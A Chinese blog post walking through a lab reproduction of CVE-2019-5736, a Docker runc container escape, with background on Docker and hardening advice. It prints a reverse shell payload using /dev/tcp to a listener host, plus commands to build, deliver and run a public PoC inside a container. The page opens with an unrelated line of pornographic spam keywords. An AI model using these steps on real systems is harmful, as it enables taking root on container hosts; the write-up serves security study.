国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸

這篇具有很好參考價(jià)值的文章主要介紹了CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

CVE-2019-5736 Docker逃逸

Docker是什么?

Docker 是一個(gè)開(kāi)源的應(yīng)用容器引擎,讓開(kāi)發(fā)者可以打包他們的應(yīng)用以及依賴包到一個(gè)可移植的容器中,然后發(fā)布到任何流行的Linux或Windows操作系統(tǒng)的機(jī)器上,也可以實(shí)現(xiàn)虛擬化,容器是完全使用沙箱機(jī)制,相互之間不會(huì)有任何接口

Docker環(huán)境和普通生產(chǎn)環(huán)境的差異在哪呢?舉個(gè)列子,在普通的生產(chǎn)環(huán)境中,我們程序員寫的代碼產(chǎn)品在開(kāi)發(fā)環(huán)境中能夠運(yùn)行起來(lái),但卻在測(cè)試環(huán)境中很容易出現(xiàn)各種的Bug,報(bào)錯(cuò),這是因?yàn)閮蓚€(gè)環(huán)境中機(jī)器的配置和環(huán)境不一樣所導(dǎo)致的

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

而Docker的出現(xiàn)解決了這一差異性的問(wèn)題

在舉一個(gè)列子,平時(shí)我們?cè)谧鲩_(kāi)發(fā)項(xiàng)目的時(shí)候,需要去配置一大堆的環(huán)境依賴,而當(dāng)我們需要將項(xiàng)目遷移到其他主機(jī)或者平臺(tái)的時(shí)候,那是不是也要將一大堆的配置環(huán)境依賴同樣進(jìn)行遷移,顯得相當(dāng)?shù)穆闊?/p>

像平時(shí)我們?cè)谏a(chǎn)環(huán)境中,會(huì)去做集群,負(fù)載均衡,來(lái)讓多臺(tái)服務(wù)器共同承擔(dān)一個(gè)責(zé)任,分?jǐn)傇L問(wèn)流量的壓力,當(dāng)我們部署好一臺(tái)服務(wù)器時(shí),你還需要更多一摸一樣的服務(wù)器,這個(gè)時(shí)候,你應(yīng)該怎么辦呢?是不是得將環(huán)境依賴什么的從頭到尾重新安裝一遍,是不是會(huì)非常麻煩

所以歸根結(jié)底,突出兩個(gè)問(wèn)題,一是環(huán)境一致性的問(wèn)題,二是重復(fù)配置,浪費(fèi)時(shí)間的問(wèn)題,所以Docker的出現(xiàn)解決了這兩個(gè)問(wèn)題

你可以把Docker理解成一個(gè)鏡像,當(dāng)我們需要在其他服務(wù)器上配置相同的項(xiàng)目環(huán)境時(shí)

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

我們使用Docker相當(dāng)于復(fù)制了一個(gè)環(huán)境過(guò)去,極大解決了硬件環(huán)境所造成的環(huán)境差異性的問(wèn)題和需要重復(fù)配置環(huán)境的問(wèn)題

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全
那我們Docker的概念是不是和虛擬機(jī)有些相同?那Docker和虛擬機(jī)的差異又在哪呢?

虛擬機(jī)和Docker的對(duì)比:

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

特性 虛擬機(jī) 容器
啟動(dòng) 分鐘級(jí) 秒級(jí)
部署創(chuàng)建速度
硬盤使用 一般為GB 一般為MB
性能 弱于原生系統(tǒng),和監(jiān)視器交互 接近原生系統(tǒng),和內(nèi)核交互
資源利用率 一般幾十個(gè) 單機(jī)支持上千各容器
隔離性 系統(tǒng)級(jí)別隔離,更強(qiáng) 進(jìn)程之間的隔離,弱
安全性 強(qiáng)

容器技術(shù)發(fā)展歷史:

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

Docker使用場(chǎng)景:

1、實(shí)現(xiàn)快速部署(鏡像),例:vulhub.org
2、解決環(huán)境一致性的問(wèn)題,例:部署應(yīng)用
3、提升服務(wù)器的利用率,降低成本,例:安裝服務(wù)
4、隔離不同的應(yīng)用

Docker的組成

Docker組成:

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全
核心概念:

  • 鏡像Image:打包好的應(yīng)用環(huán)境,模板,不能修改,列:Nginx、Tomcat、MySQL、桃寶商城、Ubuntu鏡像
  • 容器Container:鏡像+讀寫層,有狀態(tài):運(yùn)行、暫停、停止
  • 倉(cāng)庫(kù)Registry:存放各種鏡像,提供上傳和下載,官方倉(cāng)庫(kù):https://hub.docker.com

復(fù)現(xiàn)環(huán)境搭建說(shuō)明

什么叫Docker逃逸?

Docker容器相當(dāng)于一個(gè)小型的Linux操作系統(tǒng),有自己磁盤、網(wǎng)絡(luò)、進(jìn)程、用戶體系,而Docker逃逸就是我們由Docker權(quán)限獲得到主機(jī)root權(quán)限的過(guò)程,簡(jiǎn)單來(lái)說(shuō)就是從Docker的權(quán)限得到了部署Docker環(huán)境的主機(jī)的權(quán)限

Docker逃逸原因類型

1、由操作系統(tǒng)內(nèi)核漏洞引起:CVE-2016-5195(臟牛)
2、由Docker本身的漏洞引起:CVE-2019-5736、CVE- 2019-14271
3、由Docker配置和使用不當(dāng)引起

(1)開(kāi)啟privileged(特權(quán)模式)
(2)宿主機(jī)目錄掛載(文件掛載)
(3)docket remote api未授權(quán)訪問(wèn)導(dǎo)致逃逸

參考鏈接:淺析docker的多種逃逸方法

CVE-2019-5736 環(huán)境搭建

漏洞條件:

root運(yùn)行Docker
Docker Version < 18.09.2
runc版本<=1.0-rc6

現(xiàn)成靶機(jī)下載

鏈接:https://pan.baidu.com/s/19uXXlyAUUJLX4wJcwEAUgw?pwd=8888
靶機(jī)密碼:123456 兩個(gè)賬戶都是

Docker逃逸演示

復(fù)現(xiàn)環(huán)境

機(jī)器名 IP
kali 192.168.142.128
centos 192.168.142.166

Kali機(jī)器開(kāi)啟監(jiān)聽(tīng)

nc -lvnp 7777

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

靶機(jī)查看版本

docker -v
docker-runc -v

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

啟動(dòng)Docker服務(wù)(這一步需要輸入密碼123456)

service docker start

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

運(yùn)行一個(gè)容器

docker run -it ubuntu:18.04 "/bin/bash"

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

下載編譯利用腳本

git clone https://github.com/Frichetten/CVE-2019-5736-PoC
cd /home/kali/桌面/CVE-2019-5736-PoC-master

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

編輯POC文件

vim main.go

加入反彈shell的命令

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.142.128/7777 0>&1" + shellCmd

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

修改腳本編譯腳本

首先安裝go編譯環(huán)境

yum install epel-release
yum install golang

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

編譯poc

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

kali機(jī)器開(kāi)啟HTTP服務(wù)

python -m http.server 7987

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

centos機(jī)器下載poc

curl -O http://192.168.142.128/main

如圖我們已經(jīng)成功的向Docker的主機(jī)上傳了Poc文件
CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

然后由于我們要做的是容器逃逸,所以POC需要運(yùn)行在容器環(huán)境中,所以我們需要將main.go文件拷貝到Docker環(huán)境中

查看容器

docker container ls -a

啟動(dòng)容器

docker start  501c

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

容器拷貝poc

docker cp ./main  501c:/home

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

進(jìn)入Docker bash

docker exec -it 501c /bin/sh
cd /home
ls

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

在容器中執(zhí)行poc

chmod 777 main
./main

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

centos以root身份再次進(jìn)入Docker

docker exec -it 501c /bin/bash

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

docker容器執(zhí)行反彈shell命令

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

kali機(jī)器收到監(jiān)聽(tīng)會(huì)話

CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸,CVE漏洞復(fù)現(xiàn),docker,linux,網(wǎng)絡(luò)安全,安全

原理分析

在runc exec加入到容器的命名空間之后(runc運(yùn)行原理),容器內(nèi)進(jìn)程已經(jīng)能夠通過(guò)內(nèi)部/proc(虛擬文件系統(tǒng))觀察到它,此時(shí)如果打開(kāi)/proc/[runc-PID]/exe并寫入一些內(nèi)容,就能夠?qū)崿F(xiàn)將宿主機(jī)上的runc二進(jìn)制程序覆蓋。
下一次用戶調(diào)用runc去執(zhí)行命令時(shí),實(shí)際執(zhí)行的將是攻擊者放置的指令。

總結(jié):篡改了系統(tǒng)的runc文件,在其中加入惡意代碼,在下一次run exec的時(shí)候?qū)е聬阂獯a執(zhí)行

Docker安全加固

Docker安全檢測(cè)

自動(dòng)化利用工具:https://github.com/cdk-team/CDK

這個(gè)工具可以檢測(cè)Docker容器和K8S集群的一些漏洞

Docker加固建議

1、升級(jí)Docker到最新版
2、升級(jí)Linux內(nèi)核
3、不建議以root權(quán)限運(yùn)行Docker服務(wù)
4、不建議以privileged(特權(quán)模式)啟動(dòng)Docker
5、不建議將宿主機(jī)目錄掛載至容器目錄
6、不建議將容器以–cap-add=SYSADMIN啟動(dòng),SYSADMIN意為container進(jìn)程允許執(zhí)行mount、umount等一系列系統(tǒng)管理操作,存在容器逃逸風(fēng)險(xiǎn)

參考資料:https://mp.weixin.qq.com/s/R5DV0X3QpYmaxVxIexRYgA文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-517095.html

到了這里,關(guān)于CVE漏洞復(fù)現(xiàn)-CVE-2019-5736 Docker逃逸的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)

    【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)

    2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了 Windows 遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞影響了某些舊版本的 Windows 系統(tǒng)。此漏洞是預(yù)身份驗(yàn)證,無(wú)需用戶交互,這就意味著這個(gè)漏洞可以通過(guò)網(wǎng)絡(luò)蠕蟲(chóng)的方式被利用,與2017年 WannaCry 勒索病毒的傳播方式類似。 存在漏洞的

    2024年02月04日
    瀏覽(20)
  • 中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等。 中間件所披露的問(wèn)題: 中間件安全-IISApacheTomcatNginx漏洞復(fù)現(xiàn) 中間件安全-WeblogicJenkinsGlassFish漏洞復(fù)現(xiàn) 1、中間

    2024年02月08日
    瀏覽(27)
  • [ vulhub漏洞復(fù)現(xiàn)篇 ] Drupal XSS漏洞 (CVE-2019-6341)

    ????? 博主介紹:大家好,我是 _PowerShell ,很高興認(rèn)識(shí)大家~ ?主攻領(lǐng)域:【滲透領(lǐng)域】【數(shù)據(jù)通信】 【通訊安全】 【web安全】【面試分析】 ??點(diǎn)贊?評(píng)論?收藏 == 養(yǎng)成習(xí)慣(一鍵三連)?? ??歡迎關(guān)注??一起學(xué)習(xí)??一起討論??一起進(jìn)步??文末有彩蛋 ??作者水平有

    2023年04月16日
    瀏覽(20)
  • [漏洞復(fù)現(xiàn)] jenkins 遠(yuǎn)程代碼執(zhí)行 (CVE-2019-100300)

    [漏洞復(fù)現(xiàn)] jenkins 遠(yuǎn)程代碼執(zhí)行 (CVE-2019-100300)

    擁有Overall/Read 權(quán)限的用戶可以繞過(guò)沙盒保護(hù),在jenkins可以執(zhí)行任意代碼。此漏洞需要一個(gè)賬號(hào)密碼和一個(gè)存在的job。 Jenkins的pipeline主要是通過(guò)一個(gè)配置文件或者job里面的pipeline腳本配置來(lái)設(shè)定每個(gè)job的步驟. pipeline定義了幾乎所有要用到的流程, 比如執(zhí)行shell, 存檔, 生成測(cè)試

    2024年02月16日
    瀏覽(21)
  • CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是CVE-2019-11043(PHP遠(yuǎn)程代碼執(zhí)行漏洞)復(fù)現(xiàn)。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)! 再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試! CVE-2019-11043漏

    2024年02月06日
    瀏覽(23)
  • CVE-2019-0708遠(yuǎn)程桌面服務(wù)遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)

    CVE-2019-0708遠(yuǎn)程桌面服務(wù)遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)

    1、相關(guān)簡(jiǎn)介 Windows再次被曝出一個(gè)破壞力巨大的高危遠(yuǎn)程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠(yuǎn)程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)

    2024年02月10日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過(guò)程(特詳細(xì))

    【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過(guò)程(特詳細(xì))

    分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過(guò)程中用心寫的,可以點(diǎn)開(kāi)以下鏈接獲取: 超詳細(xì)的網(wǎng)絡(luò)安全筆記 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。該漏洞是由于Tomcat AJP協(xié)議存在缺陷而導(dǎo)致,攻擊者利用該漏洞可通過(guò)構(gòu)造特定參數(shù),讀取服務(wù)器webapp下的

    2024年02月08日
    瀏覽(24)
  • 【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)

    【網(wǎng)絡(luò)安全】CVE漏洞分析以及復(fù)現(xiàn)

    漏洞詳情 Shiro 在路徑控制的時(shí)候,未能對(duì)傳入的 url 編碼進(jìn)行 decode 解碼,導(dǎo)致攻擊者可以繞過(guò)過(guò)濾器,訪問(wèn)被過(guò)濾的路徑。 漏洞影響版本 Shiro 1.0.0-incubating 對(duì)應(yīng) Maven Repo 里面也有 【一一幫助安全學(xué)習(xí),所有資源獲取一一】 ①網(wǎng)絡(luò)安全學(xué)習(xí)路線 ②20份滲透測(cè)試電子書 ③安全

    2024年02月06日
    瀏覽(28)
  • 【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    1. 漏洞簡(jiǎn)介 Ruby on Rails使用了指定參數(shù)的render file來(lái)渲染應(yīng)用之外的視圖,且會(huì)根據(jù)用戶傳入的Accept頭來(lái)確定文件具體位置。我們可以通過(guò)修改訪問(wèn)某控制器的請(qǐng)求包,通過(guò)…/…/…/…/來(lái)達(dá)到路徑穿越的目的,然后再通過(guò){{來(lái)閉合模板查詢路徑,那我們?cè)L問(wèn)的文件會(huì)被當(dāng)做外部

    2024年02月04日
    瀏覽(32)
  • 云上攻防--云原生&&Docker逃逸--特權(quán)逃逸--危險(xiǎn)掛載--漏洞逃逸

    云上攻防--云原生&&Docker逃逸--特權(quán)逃逸--危險(xiǎn)掛載--漏洞逃逸

    Docker介紹 Docker 是一個(gè)開(kāi)放源代碼軟件,是一個(gè)開(kāi)放平臺(tái),用于開(kāi)發(fā)應(yīng)用、交付(shipping)應(yīng)用、運(yùn)行應(yīng)用。Docker允許用戶將基礎(chǔ)設(shè)施(Infrastructure)中的應(yīng)用單獨(dú)分割出來(lái),形成更小的顆粒(容器),從而提高交付軟件的速度。 Docker 容器與虛擬機(jī)類似,但二者在原理上不同

    2024年01月25日
    瀏覽(36)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包